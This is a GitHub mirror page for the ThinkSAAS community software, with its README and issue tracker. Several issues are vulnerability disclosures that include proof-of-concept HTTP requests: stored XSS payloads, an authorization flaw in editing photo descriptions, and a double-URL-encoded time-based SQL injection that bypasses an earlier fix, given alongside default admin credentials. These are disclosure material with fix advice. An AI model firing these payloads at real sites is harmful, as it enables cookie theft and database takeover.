thinksaas / thinksaas Goto Github PK

View Code? Open in Web Editor NEW

248.0 22.0 64.0 16.58 MB

ThinkSAAS open source community

Home Page: https://www.thinksaas.cn

License: MIT License

PHP 33.59% JavaScript 33.80% CSS 2.67% HTML 29.87% Dockerfile 0.07%

php thinksaas

thinksaas's Introduction

ThinkSAAS

ThinkSAAS is a lightweight open source community system that can be used to build vertical networks.
ThinkSAAS is a simple, highly scalable community development system.
ThinkSAAS can help you quickly develop and build a unique communication community.

Development environment

php >= 7.0
MySQL >= 5.6
MariaDB >= 5.6
Apache / Nginx
Windows / Linux
It is recommended to use lnmp or lamp environment

System Features

Development is simple, and PHP novices can also develop powerful functions.
single entrance.
The extension is powerful, supports application extension and plug-in extension, and supports http api interface extension.
Modules can be individually configured with independent databases.
Multi-terminal adaptive, integrated bootstrap.
The bottom layer loads quickly and has strong pressure resistance and concurrency capabilities.
Support composer method to install PHP third-party extension library.
The system is stable, functionally modular, simple in secondary development, and continuously upgraded.
Suitable for individual and team collaboration development.

System basic functions

用户中心模块(user)
系统管理模块(system)
小组模块(group)
话题模块(topic)
文章模块(article)
相册模块(photo)
标签模块(tag)
邮件模块(mail)
消息模块(message)
唠叨模块(weibo)
搜索模块(search)
我的社区(my)
支持Email注册登录
支持手机号注册
支持短信验证码登录
支持阿里云对象存储OSS
支持发布内容人机验证
支持敏感词过滤
支持用户行为日志记录
支持微信公众号网页授权登录
支持用户积分
更多特点和功能期待您的发现！

Open source agreement

MIT License

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Installation Notes

Upload all files in the directory to the root directory of your website (Linux systems must use FTP binary upload)
Directly enter your website address to install (do not include install)
Enter the database connection information, website information and administrator information according to the installation prompts (please manually create an empty database for ThinkSAAS before installation)
The installation is successful.

thinksaas's People

Contributors

Stargazers

Watchers

thinksaas's Issues

Stored XSS in comments post

Stored XSS in comment posting
发表评论处存储型xss

The comment part is vulnerable with js-injected-svg xss, which malicious js code may get executed.
评论处存在svg注入js代码的xss漏洞，受害者将可能执行恶意js代码。

Ways to reproduce:
复现方法：
1 comment on any posts with malicious js code injected, like following:
1 在文章后发表带有恶意代码的评论，请求如下：

POST /index.php?app=group&ac=comment&ts=do&js=1 HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://yourdomain/thinknew/index.php?app=group&ac=topic&id=1
Content-Length: 104
Cookie: 
Connection: close

content=`<p>aaa<br><embed src=//html5sec.org/test.svg /></p>`&ispublic=0&topicid=1&token=99dc80d60a3284e86a8eef06c28a932f5614d29a

2 a alert box would pop, thus js code has been excuted.
2 弹框，说明js代码已经成功执行

ThinkSAAS 3.7.0 has a storage XSS vulnerability

Summary

There is a storage XSS vulnerability in ThinkSAAS 3.7.0. The vulnerability occurs in the "back-plug-management-statistics code plug-in", where modifying the statistics code does not require CSRF validation, so an attacker can construct a form that allows an administrator to propose the addition of the statistics code. The plugins/edit/pubs/counter.php is not right
code is strictly filtered, so every time an administrator accesses index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html that directly references the variable {$code} triggers a stored XSS vulnerability.
If the statistics code plug-in is turned on, then all users accessing the website will trigger the stored XSS vulnerability on any page.Because, according to the plugins/pubs/counter/counter.php logic, {$code} will be inserted into the all pages.

Details

<?php
defined('IN_TS') or die('Access Denied.');

//插件编辑
switch($ts){
    case "set":

        $strAbout = fileRead('plugins/pubs/counter/about.php');

        $code = fileRead('data/plugins_pubs_counter.php');
        if($code==''){
            $code = $tsMySqlCache->get('plugins_pubs_counter');
        }
        $code = stripslashes($code);

        include template('edit_set','counter');
        break;
        
    case "do":
        $code = tsTrim($_POST['code']);
        
        fileWrite('plugins_pubs_counter.php','data',$code);
        $tsMySqlCache->set('plugins_pubs_counter',$code);
        
        header('Location: '.SITE_URL.'index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set');
        break;
}

As above, the plugins/pubs/counter/edit. PHP in modified statistical code have no code in the tag </textarea> filtering, so that the follow-up in edit_set.html rendering {$code}, The </textarea> closing the <textarea> tag causes the $code that should be inside the textarea tag to be outside the tag.

Proof of Concept (POC)

POST /index.php?ac=plugin&app=pubs&in=edit&plugin=counter&ts=do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7i6edin000gfa5r6s1aje15noc; ts_email=admin%40admin.com; ts_autologin=rufq90izjw0s8kko8gkgk8gkg0s80g8
Content-Length: 58
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: your-ip
Connection: Keep-alive

code=</textarea><ScRiPt%20>alert(document.cookie)</ScRiPt>

#FR#文章子分类

目前的文章分类只有一级分类。
允许支持二级分类如何？

PS. FR=Feature Request

Stored xss in study

Environment:
program version: ThinkSAAS 2.93
app version: 课程(study) | 1.0
``
环境：
程序版本: ThinkSAAS 2.93
应用版本: 课程(study) | 1.0

1 . Request this url: example.com/index.php?app=study
1 . 访问这个url: example.com/index.php?app=study

2 . Click '创建课程'(Create Lession), then redirect to example.com/index.php?app=study&ac=create
2 . 点击‘创建课程’，然后跳转至example.com/index.php?app=study&ac=create

3 . Write the xss payload to ‘课程标题’(Lession Title)
3 . 将xss payload写进'课程标题'

POST /index.php?app=study&ac=create&ts=do HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 668
Origin: http://example.com
Connection: close
Referer: http://example.com/index.php?app=study&ac=create
Cookie: Hm_lvt_1676addd34fc71983d401b8bd972b0c1=1567155131,1567416207; PHPSESSID=5nkq72udqv51008t7f7lsqekau; ts_email=1%401.com; ts_autologin=dgswuiwhehsko8088w40kwow8k0w8oo
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="studyname"

xss<script>alert(1)</script>
-----------------------------293582696224464
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="content"

<p>content<br></p>
-----------------------------293582696224464
Content-Disposition: form-data; name="price"

0
-----------------------------293582696224464
Content-Disposition: form-data; name="cateid"

1
-----------------------------293582696224464--

4 . Then we will redirect to the page that we just created, and the alert will be pop up.
4 . 之后我们将被重定向到刚刚创建的页面，并弹出警报。

5 . The alert also can be pop up when admin see the 'Lession List' ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )
5 . 管理员浏览到'课程列表'时也会弹出警报 ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )

Thinksns Overrides the Right to Modify the Photo Description of Albums thinksns越权修改相册图片描述

Thinksns Overrides the Right to Modify the Photo Description of Albums

POST Packet:
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Your landing cookie

photoid%5B%5D=101&photodesc%5B%5D=test

Get parameters: Log in to demo on the official website, select an album: https://demo.thinksaas.cn/photo/, enter an album: https://demo.thinksaas.cn/photo/album/84/, click on an image: https://demo.thinksaas.cn/photo/show/103/, photoid%5B%5D parameter is show parameter, and then replay the data package to change the description of other people's picture to photodesc%5B%5D parameter.

/////////////////////////////////////////////////////////////////////

thinksns越权修改相册图片描述

POST数据包：
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text�cml,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 你的登陆cookie

photoid%5B%5D=101&photodesc%5B%5D=test

获取参数：在官网demo登陆，选择一个相册：https://demo.thinksaas.cn/photo/，进入一个相册：https://demo.thinksaas.cn/photo/album/84/，在点击一个图片：https://demo.thinksaas.cn/photo/show/103/，photoid%5B%5D参数为show参数后数字，重放数据包即可将别人的图片描述改为photodesc%5B%5D参数的test

ThinkSAAS 3.7.0 has a storage XSS vulnerability

Summary

ThinkSAAS 3.7.0 has a storage XSS vulnerability. Among them, the request filtered by background - security center - sensitive words does not have CSRF verification. After the administrator clicks the malicious link, it can not only affect the normal business logic through CSRF vulnerability to add or delete any sensitive words, but also cause storage XSS vulnerability.

Details

It appears in app/system/action/anti.php, such as the following parts:

case "worddo":
    $word = tsTrim($_POST['word']);
    if($word){
        $isWord = $new['system']->findCount('anti_word',array(
            'word'=>$word,
        ));
        if($isWord == 0){
            $new['system']->create('anti_word',array(
                'word'=>$word,
                'addtime'=>date('Y-m-d H:i:s'),
            ));

            [...省略其他代码...]

            qiMsg('敏感词添加成功！');
    }else{
        qiMsg('敏感词不能为空！');
    }

In the above section of code, the contents of $_POST['word'] are used directly to create new sensitive words without any filtering or checking, making it easy to inject dangerous content.

Proof of Concept (POC)

POST /index.php?app=system&ac=anti&ts=worddo HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ts_email=admin%40admin.com; ts_autologin=a21tr9l9wg00w8swgwckks4g0cskw8w; timezone=8; username_c1aa741a=admin; token_c1aa741a=5215abf192a064ccc90d9518304b966ee972689be2ca9d82e4bbd516b3301a6e1712987537; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; http304ok=1
Connection: close

word=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

给APP改名后，顶部导航栏中的名字照旧

如图，我把资料改成了附件。但是在顶部导航栏还是显示资料。

函数错误

Deprecated: Function get_magic_quotes_gpc() is deprecated in thinksaas/thinksaas.php on line 63

1111

停用并再次启用幻灯片后，幻灯片位置有变化

在管理界面把幻灯片插件停用，并再次启用后，幻灯片插件在首页的位置与刚安装后的位置不一样。
刚安装完的时候，幻灯片插件在最顶部，在文字广告栏下面。
然而再次启用后，幻灯片插件在底部，在友情链接上面。

希望增加小组排序ID

资料app无法搜索，希望增加

请求支持php7

RT,
目前已知以下被废弃的函数有用到：

set_magic_quotes_runtime

另：要求在各个安装环境需求中有关PHP版本的描述改为：PHP>=5.3, PHP<=7

存储型xss（需要注册登录）/ Storage type XSS（Need to register and log in）

Storage type XSS（Need to register and log in）
When the article is published:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

Add an attack poc：<iframe src=javascript:alert('success');height=0 width=0 /><iframe> to the %2Fp%3E after the content parameter

Official return：https://demo.thinksaas.cn/article/show/395/

////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

存储型xss（需要注册登录）
发表文章时：
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

在content参数后%2Fp%3E添加攻击poc:<iframe src=javascript:alert('success');height=0 width=0 /><iframe>

官方复现：https://demo.thinksaas.cn/article/show/395/

删除积分兑换商品没有删除关联

优化第三方登录（qq等）在开启email验证情况下的体验问题

Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php#2 （bypass of CVE-2020-35337）

0x01 Summay

In last December last year, there were security problems caused by improper URLDecode. Reference#24
To sum up, it is inThinkSAAS-master\app\topic\action\admin\topic.php, improper filtering of keyword parameters leads to SQL injection.
In last year's fix plan (clickHereDirect), the first is$titleChanged$kwVariable,

And, aftertsFilterFunction filtering.
However, there are still security risks now.

# Responsible Vulnerability Disclosure info

Title: 
	ThinkSAAS has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

Desc:
  ThinkSAAS before 3.52 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter（need the privilege of admin）, allowing logged attackers to execute arbitrary SQL commands.	This is a bypass of CVE-2020-35337. 

Credit: 
Qianxin, Network Security Department, Product-Safety Team ( Unc1e )

Result:
The vendor has confirmed this vuln and updated [ThinkSAAS 3.53] to fix this vuln.

Reference:
- https://github.com/thinksaas/ThinkSAAS/issues/28

0x02 security vulnerability analysis

Global filtering analysis
In ThinkSAAS-master\thinksaas\thinksaas.php#62, usetsgpcFilter

Using addslashes to prevent SQL injection

(1)`tsFilter`Improper function filtering logic

tsFilterFunctionThinkSAAS-master\thinksaas\tsFunction.phpIn (clickHereDirect)
This function replaces some of the dangerous keywords with null, but an error is made here: it is replaced only once, causing attackers to use the double-write method to construct

SELselect ECT

To escape from the realSELECT

Therefore, we recommend that youReplace only onceTheIf, change to meetingLoop replacementTheWhile

(2) improper filtering order

Please note: The problem in (1) just now is not the most important-even if there is no problem in (1), we can also carry out SQL injection attacks.
Inapp/topic/action/admin/topic.phpIn the implementation of the logic (clickHereDirect), is the user input variable$_get ['kw']The SQL injection vulnerability is caused by filtering and then using URLDecode function decoding.

In short, it isThe value of the filter.WithFinally concatenate and substitute the values of the Query DatabaseProblems caused by differences.
The procedure is as follows:

1, User-input param: %2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520

 
2, the $kw param Server received（has been auto UrlDecoded for once）: %50%6f%43%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%73%6c%65%65%70%28%31%29%29%78%29%20%2d%2d%20
  - goto thinksaas/thinksaas.php#62 via tsgpc()
  - tsgpc() actually do addslashes() to escape [',"]【there is no [',"], you konw】
  - then via the line 13 tsFilter() to filter black-word【actually do no operation】
	- param no change
  
3, $kw=urldecode(tsFilter($_GET['kw']));  
 notice the $kw param has been UrlDecoded agained (for twice, you know):
PoC' and (select 1 from (select sleep(1))x) -- 
  
4，So the impace is: Post-Auth SQL-injection（后台SQL注入）:
SELECT * FROM ts_topic WHERE `title` like '%PoC' and (select 1 from (select sleep(1))x) -- %' ORDER BY addtime desc

Or if you still feel unclear, you canthinksaas\tsApp.php#165Add the debugging code of "print SQL statement", as shown in the following figure:

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&kw=%2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520 HTTP/1.1
Host: thinksaas
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://thinksaas/index.php?install=result
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=t86vbus6e31om7uv1mrskb3ea5; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1627657957; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1627657957
Connection: close

Causing a delay of 2 seconds

0x03 vulnerability verification(PoC & EXPLOIT)

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1
Host: thinksaas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword
Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8
Upgrade-Insecure-Requests: 1

First, access the system management login interface, enter the account and password to log on to the background.

http://thinksaas/index.php?app=user&ac=system
- Default password is:
- admin@admin.com / 123456

Next, visit the URL

http://thinksaas//index.php?app=topic&ac=admin&mg=topic&ts=list&kw=%2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520

A 2-second latency is observed on the web page, which is the proof of concept (PoC) of the vulnerability.

When exploiting this vulnerability, attackers can use logical operations to fully control the database, query information in the database, write data to webshell, and other dangerous operations.

0x04 vulnerability fix

(1) optimization`tsFilter`Function

tsFilterFunctionThinkSAAS-master\thinksaas\tsFunction.phpIn (clickHereDirect)
We recommend that you do not use a blacklist to prevent SQL injection. However, if the solution is fixed, you can tsFunction the functionReplace only onceTheIf, change to meetingLoop replacementTheWhile

(2) fixed the logic in topic.php.

Best removeurldecode, filter directly.
If [decode first, then filter], there is still a risk, because the URLDecode decode, so that attackers can bypass the globaltsgpc()To prevent SQL injection, use the addslashes function correctly.
Willapp/topic/action/admin/topic.phpIn the implementation of the logic (clickHereDirect), changed

$kw=tsFilter($_GET['kw']);  //推荐写法

0x05 Time Line

2021.07.31 08:40, Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) reported this issue to the developer of ThinkSAAS, via Wechat.
2021.07.31 09:07, ThinkSAAS confirmed this vulnerability.
2021.07.31 09:26, Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) reviewed the mitigation of this vuln. (See 07ad849#diff-96592e102fa5e61c02150b963d7e30f03b7a5270be074b22091c1aca4bb321fb)
2021.07.31 12:00, ThinkSAAS updated ThinkSAAS 3.53 to fix this vuln.

希望后台增加批量操作功能

比如列表全选，可以批量删除和审核。现在得一个个的点，累死！

课程列表显示名称不全

课程列表显示名称不全，并且title错误：{item['studyname']}

存储型xss2（需要注册登录）/ Storage type XSS2（Need to register and log in）

当添加小组时：https://demo.thinksaas.cn/group/create/
When the group is added:https://demo.thinksaas.cn/group/create/

修改小组介绍时：
When the revision of the panel:

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 620
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEZvXgMRfRnvrT3s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/group/create/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=1agufb6os5sik9vb5onfcr0vs4; ts_email=admin%40mimaz.org; ts_autologin=c9qrjmbdwf4kw4ok4okoc0ggc84g8gc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1533621094,1533625100,1533625361,1533625712; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1533625993

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupname"

name1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupdesc"

describe1<script src="1.js">
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="tag"

Label1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="token"

ff94d70c0394174b299ac1c1efc5ccd539fc484e
------WebKitFormBoundaryWEZvXgMRfRnvrT3s--

在groupdesc参数端未过滤恶意代码，造成注入。
The malicious code is not filtered at the groupdesc parameter end, causing injection.

POC：<script src="1.js">

官方举例：https://demo.thinksaas.cn/group/show/54/
Official examples:https://demo.thinksaas.cn/group/show/54/

后台管理员可以在前台删除小组的文章，但是无法修改小组的资料和图标

提示总是非法操作。

存储型xss2（需要注册登录）/ Storage type XSS2（Need to register and log in）

当添加小组时：https://demo.thinksaas.cn/group/create/
When the group is added:https://demo.thinksaas.cn/group/create/

修改小组介绍时：
When the revision of the panel:

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupname"

name1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupdesc"

describe1<script src="1.js">
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="tag"

Label1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="token"

ff94d70c0394174b299ac1c1efc5ccd539fc484e
------WebKitFormBoundaryWEZvXgMRfRnvrT3s--

在groupdesc参数端未过滤恶意代码，造成注入。
The malicious code is not filtered at the groupdesc parameter end, causing injection.

POC：<script src="1.js">

官方举例：https://demo.thinksaas.cn/group/show/54/
Official examples:https://demo.thinksaas.cn/group/show/54/

Stored xss when administrator edits posts in the same group, or just click a url

Stored xss when administrator edits posts in the same group, or just click a url
存储型跨站漏洞,当组管理员修改组内帖子时触发,也可直接点击触发

Ways to reproduce：
复现方法：

1 admin1 creates a new group with the following request, notice that the malicious code has been injected in groupname param.
1 admin1使用如下请求建立一个小组，注意groupname字段已经被注入恶意代码。

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"

`<img src=1 onerror=alert(1)>`
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------159522762613371
Content-Disposition: form-data; name="tag"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"

99dc80d60a3284e86a8eef06c28a932f5614d29a
-----------------------------159522762613371--

2 admin1 invites admin2 as an administrator of this new group and post anything. PS: without agreement, one could invite anyone as his group adminstrator.
2 admin1邀请admin2作为小组管理员，并发帖。同时：邀请别人成为小组管理员并不需要获得其同意。
3 once admin2 edits any posts in this group, or just click: http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={your_topic_id_which_easy_to_get}
admin2 would execute the js code which had been injected in the group name.
3 当admin2管理组内帖子时，或只是点击url：http://yourdomian/thinknew/index.php?app=group&ac=topicedit&topicid={你的topic id，很容易获取}
admin2将执行已经被嵌入groupname中的js代码

Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php SQL注入

Details can be retrived in https://blog.unc1e.com/2020/12/thinksaas-has-post-auth-sql-injection.html
PDF, Thinksaas has a Post-Auth SQL injection vulnerability in app_topic_action_admin_topic.php.pdf
Author of the vuln: Qianxin, Network Security Department, Product-Safety Team ( Unc1e )

app/topic/action/admin/topic.php 的title参数存在SQL注入漏洞

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1
Host: thinksaas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword
Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8
Upgrade-Insecure-Requests: 1

Will cause a delay of 6 seconds

thinksaas / thinksaas Goto Github PK

thinksaas's Introduction

ThinkSAAS

Development environment

System Features

System basic functions

Open source agreement

Installation Notes

thinksaas's People

Contributors

Stargazers

Watchers

Forkers

thinksaas's Issues

Summary

Details

Proof of Concept (POC)

Summary

Details

Proof of Concept (POC)

0x01 Summay

0x02 security vulnerability analysis

(1)tsFilterImproper function filtering logic

(2) improper filtering order

0x03 vulnerability verification(PoC & EXPLOIT)

​

0x04 vulnerability fix

(1) optimizationtsFilterFunction

(2) fixed the logic in topic.php.

0x05 Time Line

app/topic/action/admin/topic.php 的title参数存在SQL注入漏洞

Recommend Projects

Recommend Topics

Recommend Org

(1)`tsFilter`Improper function filtering logic

(1) optimization`tsFilter`Function